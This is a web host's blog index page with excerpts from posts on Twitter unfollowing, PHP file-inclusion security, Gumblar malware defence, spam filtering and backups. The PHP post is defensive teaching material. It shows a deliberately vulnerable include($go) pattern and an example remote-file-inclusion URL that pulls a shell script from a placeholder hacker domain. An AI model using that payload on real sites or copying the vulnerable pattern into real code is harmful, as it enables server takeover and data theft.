RSS Updates

Recent Status Updates

Categories

Ajax CommentLuv Enabled d7bd6171d8498636a60ff2238fbfcd00

10

Jul

6

How To Bulk Unfollow On Twitter in Minutes

Published by Laurence (aka NexDog) in Web Development.

I haven’t “tweeted” for a long time. I joined Twitter on the general bandwagon last year, downloaded and installed TweetDeck – and pretty much forgot about it. I did turn on Auto-Follow via SocialOomph though. So a year later I have 3,000 followers and maybe 50 are HostNexus clients and people I know. So 2,950 people have followed me for the sole reason of spamming me with links to their sites. They don’t care what I say because, well, I say very little. If I’m ever going to really use Twitter I need to follow only those I have a general interest in following and that is people I choose to follow and any past, present or prospective clients of HostNexus.

So today I went on a mission to purge my Twitter account.

As most people in Twitterdom know, there are thousands of apps that help you manage your Twitter account, so I thought that mass unfollowing on Twitter was going to be pretty simple. I tried several tools but all either had no Bulk Unfollow option or no Select All option. I started hitting Unfollow on people on Twitter Karma but that got real old after about 100 clicks. I then start hitting checkboxes on Tweepi and Untweeps but another 150 clicks later my right index finger started to cramp up in a death grip from hell. But both Tweepi and Untweeps do not list all your followers so it was kind of pointless anyhow. I then found ManageFlitter which listed all your followers in pages of 100 with checkboxes, but of course no Select All option.

I did some digging and found out that Twitter had put their foot down on Mass Unfollowing in April of this year (2010). All applications either had to remove Bulk Unfollow options or the Select All option to continue to operate within Twitter’s update TOS. Pretty ridiculous. I can understand enforcing a Bulk Unfollow option but telling developers to remove a “Select All” option? Very weird. But it got me thinking. The Select All thing is just a JavaScript call and happens in your browser so surely there should be a nifty little FireFox plugin that allows me to Select All?
Read the rest of this entry »

17 Comments

10

Jun

21

PHP Security and YOU – Including files the right way

Published by Laurence (aka NexDog) in Web Development.

As a web host we fight the battle against hackers and bad code on a daily basis. So HostNexus is looking to encourage clients to use file inclusion within PHP in a more security conscious and safe manner.

Including files with PHP is a common practice and most usage comes in 2 forms. These are including internal files from your own domain and including files from remote (external) sources. This looks something like:

Internal:

< ?php
   include("http://www.myowndomain.com/something.txt");
?>

External:

< ?php
   include("http://www.externaldomain.com/something.txt");
?>

Both are valid syntax in the PHP world but there are two main problems we see on the servers. Sometimes when you include a file using the the URL of your local domain you can cause a PHP loop that initiates endless HTTP requests which causes server load issues and even a server crash due to the load. If you want to include files from your local domain you just need to use the server path instead:

< ?php
   ('/home/httpd/vhosts/myowndomain.com/httpdocs/something.txt');
?>

And now onto using include() for calling external files:

< ?php
   include("http://www.externaldomain.com/something.txt");
?>

The main problem with include() is that runs everything through the PHP parser and evaluates code. The main problem comes from setting a variable for include() which can be easily exploited. Here is an example of code in an index.php:

< ?php
    echo "<html>\n";
    echo "  <body>\n";
    include("$go");
    echo "  </body>\n";
    echo "\n";
?>

The $go variable above is easily exploited like:

http://myowndomain.com/index.php?go=http://www.hackerdomain.com/shell.txt

The hacker can now execute commands on your files, installing phishing sites, sending spam and stealing data.

If you want to include files from remote domains use PHP’s readfile() function instead:

http://www.php.net/manual/en/function.readfile.php

While not 100% secure it still provides more protection as readfile() simply outputs data to a browser rather than parsing everything as PHP.

We’d love to enforce the two practices above but we also understand not everyone is happy modifying code. However, if you know you use includes and have even a simple understanding of these fuctions then please do revisit your code and help yourself to secure your data and server.

Laurence

Tags: php, security | 0 Comments

10

Apr

14

How To Get A Professional Website Online Within One Week, For Less Than $199, And No Design Experience

Published by Laurence (aka NexDog) in Web Development.

The main hurdles most people face when thinking about getting a decent website up is that it is too expensive and/or requires certain nerdy technical skills such as graphic design or some kind of coding skills. And quotes from web design firms of $500 to $50,000 definitely serve to discourage many from developing an online corporate presence or even putting up a personal website.

Ten or even five years ago putting up a website was expensive and took time. But times have changed and time, money and skills (or lack thereof) are no longer obstacles would-be webmasters have to deal with. If you’ve ever thought about getting a nice website online but have always dreaded the task, here are my 7 Steps To Get Online.

Read the rest of this entry »

0 Comments

09

Oct

5

Gumblar – How To Avoid Getting Hacked

Published by Laurence (aka NexDog) in Web Hosting.

attack_site

2009 is The Year Of The Gumblar. You might not know the name but I’m sure you’ve experienced it either directly (hopefully not) or indirectly. Have you ever been surfing and come across a page with a big red sign warning against you entering the site? If you have then it’s a good chance that site was hit with Gumblar or one its variants like Nine Ball, Martuz or a host of other weird and wonderful names. If you run a successful online business can you imagine the damage such an attack could do? I actually got hit with it on a personal site I just use for storing photos. But when I thought of the damage it would have done if it had hit HostNexus……it certainly got my attention.

So what is Gumblar and how does it work? These are things EVERY webmaster MUST know! The original Gumblar used a vulnerability in Adobe Acrobat and Flash player but subsequent variants use other exploitable software but all have the same end result. I won’t go into the technicalities of how your computer gets infected but you need to know what it does. Once infected it listens in on any FTP connections and steals the connection information. Usually within minutes the virus uses your FTP account to modify files and insert some nasty code. This code is normally an iframe, javascript or some other code that triggers a malware download from another computer.

The virus will sometimes modify PHP code and insert phpshell scripts which in turn attempt to install the malware that other infected sites connect to to trigger malware downmloads to unsuspecting site visitors. This is a three-pronged nightmare that just grows exponentially. From local computer to FTP account to server infection and the wheel keeps on turning. So what’s the defence?

The virus three-pronged and therefore everyone needs to cover as many of these vulnerabilities as posible.

1) Your Computer – a decent “On-Access” anti-virus program is all you need. When I got infected I was running a cheap AV program that wasn’t On-Access. This simply means the AV program automatically scans anything that is downloaded to your computer or any file that you open on your computer. If your anti-virus just gives you a daily scan you are NOT protected. You could get infected, download some nasty stuff to your computer and proliferate the virus before you even get to your daily scan.

2) FTP over SSL. If you are on a linux server simply choose a connection option in your FTP program that is encrypted or just says “SSL”. All of our shared servers should have this working. If you find it doesn’t please contact Support and we will fix it! With this option your connection info is sent encrypted and not in plain text and the virus cannot sniff it out. We would love to implement this by default (forcing people to use it) but even though we could post about it in a newsletter, on a mail list, on our blog and on our forum we will still get hundreds of tickets asking via their FTP doesn’t work. As awareness grows maybe we will implement slowly.

If you have a dedicated server and would like FTP over SSL activated please contact Support.

Bad news for Windows clients on this front. Our Windows servers don’t currently support FTP over SSL as this is a feature included in the newer Windows 2008 OS with IIS7. It’s a huge change and one that we aren’t quite ready for. But you can still install a decent Anti-Virus program. :)

3) Server Infection – this is one area where Windows servers aren’t as vulnerable. The virus uses PHP which needs to be running as a global user such as Apache. PHP on Windows has run under a user’s FTP username as CGI for ages so even if files get infected the virus cannot break out of the user’s home directory. On linux though PHP has ran as Apache for aeons and it’s only with later versions of Plesk that we now have the option to run PHP as CGI or FastCGI. So if you’re on Plesk 9 I encourage you to switch PHP to a Fast CGI application under Web Host Settings for the domain. Some scripts can break with it so if you are not sure please don’t hesitate to contact support and we will advise you. Scripts tend to run faster under Fast CGI too so you are in fact doing yourself a service. :D

This year we’ve been dealing with Gumblar related issues almost on a weekly basis. It is very hard to convince someone that the server hasn’t been hacked when their website is showing the Reported Attack Site page. In these cases the issue almost always lies with the user’s computer being infected.

But we have also had cases where the virus has spread through Apache-owned PHP files causing malicious downloads and random page redirects to search results containing a list of infected sites. We can always track down the source but it is very frustrating for us as hosts and our users. In this case a solution would be force every domain using PHP to run as Fast CGI but as with the FTP solution there would be even more fallout. So it’s a balancing tightrope act with a bit of a dodgy safety net. All we can do as hosts is raise our own community’s awareness of this problem that doesn’t seem to be going away any time soon and hope that in the future we can implement more stricter safeguards against this menace.

I just posted this on our blog so feel free to comment there. If you’d prefer to discuss any of this in our forum that would also be most welcome.

Tags: Anti-Virus, FTP, Gumblar, Virus | 0 Comments

09

Sep

26

The zen of SpamHaus

Published by Laurence (aka NexDog) in Web Hosting.

(Somewhat long but scroll to the bottom for the important parts if pressed for time)

nospam

How would like to reduce the amount of spam coming into your mailbox by 90%?

Yes…..90%.

It can be done and it can be done very easily but for many the price might be too high.  See, the fight against spam is kind of a catch 22.  There is no solution out there that, even if it works great, won’t aggravate some users.  For web hosts this is particularly painful.  A host’s client base often demands less spam but in my experience they are unwilling to pay the price.  This is why most hosts just let the email flow and give their clients end-user tools with which to fight spam – and on the whole it works well. By using SpamAssassin and some filters I generally don’t see much spam in my inbox. On average maybe 5-10 per day. The rest gets tagged and filtered. I can certainly live with that – but some people can’t.
Read the rest of this entry »

0 Comments

09

Aug

22

How To Start a WebHosting Company – Part 1

Published by Laurence (aka NexDog) in Web Hosting.

How To Start A Web Hosting Company

The webhosting industry is very different from 2001 when I started HostNexus but many things are still the same. It’s true the competition is fierce. It’s probably the most competitive industry on the internet today. But there is good news – the internet is not getting any smaller. In fact it’s always growing as more and more people get online each and every day. Since I started HostNexus ONE BILLION people have come online – a growth of over 300% in 8 years. There will always be room for more hosting companies as long as people keep putting up websites.
Read the rest of this entry »

Tags: hosting company | 4 Comments

09

Aug

13

Easy MySQL Backups

Published by Laurence (aka NexDog) in Web Hosting.

Bit of a backup theme for this week but remember in my last post I did say I was obssessed with backups! The last post addressed our server-to-server backups, how they work and a nice example of how they can save our collective assess in the event of a 100% data loss meltdown.

But what about your own personal backups? We can of course use our system to restore individual files and databases for you – no problem there but everyone should also have personal backups. Files are easy. If you’re like me you have your sites in folders on your PC/laptop and you edit files there and upload via FTP. So by default you have a copy of your files. But what about databases? A database is written on the server so special considerations have to be made. You can do backups in phpMyAdmin and download them. But who wants to do that weekly, let alone daily? And then download the backups to your computer? I’ve done it all manually and it just sucks. You will definitely forget and that daily backup becomes weekly, then monthly, then quarterly….
Read the rest of this entry »

Tags: Backups, cron, crontab, GetRight | 0 Comments

09

Aug

9

Much Love For Backups

Published by Laurence (aka NexDog) in HostNexus.

I love backups. In fact one could say I’m a little obssessed with backups. At HostNexus we backup shared/reseller servers to big beefy backup servers across a private network at the data center. Back in the old days we used to use disk-to-disk backups and this is still the default backup method for managed dedicated servers. But as shared/reseller servers fill and get busy the amount of data can get quite large and disk-to-disk backups start to take alot of time and cause very high loads on the server so enter the remote backup system. Read the rest of this entry »

Tags: Backups, Bacula | 0 Comments

09

Apr

14

The Site That Took Three Years To Build

Published by Laurence (aka NexDog) in HostNexus.

Our new site has been live for a month now. The feedback has been truly amazing. So many people mentioned how much they liked the site and many emailed us just to say that. I thought the site was good but the sheer amount of positive feedback really took me by suprise.

We have seen a 400% increase in sales and about the same increase in traffic. The traffic stats are a bit skewed because the old NexusPortal is now integrated with HostNexus so the stats include forum traffic and support traffic. But there is no doubt that a good site helps convert visitors into customers. I saw the same thing 6 years ago when we launched the old Ceonex site.

But how often should a company change its site? The net is an ever-transforming animal so there really is a need to change designs to keep up with the latest trends. Some people say once a year but I think that’s a bit much and I certainly wouldn’t be able to handle that. I think maybe every 2 years would okay for small changes. In our case it had been 6 years so a radical change was needed but believe it or not I set out on this mission to get a new site up for HN in June 2006 – yep, 3 years ago. So just how can a site take 3 years to build?
Read the rest of this entry »

21 Comments

09

Apr

6

SEO Case Study: HostNexus

Published by Laurence (aka NexDog) in Web Development.

This is part 4 in the Search Engine Strategy Series where I am documenting my own journey in SEO and the effects it is having on HostNexus. For a table of contents on this series please see this first post

There is too much “do what I say and not what I do” on the internet so to prove I am practising what I preach here is a little case study. I’m detailing keyword terms I’m targetting, where we stood at the beginning and will update regularly (maybe once a month) to see how we are getting on.

Few things to point out though: Read the rest of this entry »

8 Comments

« Older Entries

Latest from our Blog

How To Bulk Unfollow On Twitter in...
PHP Security and YOU – Including...
How To Get A Professional Website O...
Gumblar – How To Avoid Getting Ha...
The zen of SpamHaus...

Latest From the Forum

Gemini...
POP woes on Gravitron...
URGENT: Maintenance Notification Su...
VPS1 Memory Upgrade Sunday 22nd Aug...
Atom Memory Upgrade Wednesday 3am 1...

Navigate Our Site

Copyright 2001 - 2010. Hostnexus. All Rights Reserved.
Valid XHTML 1.0  CSS Valid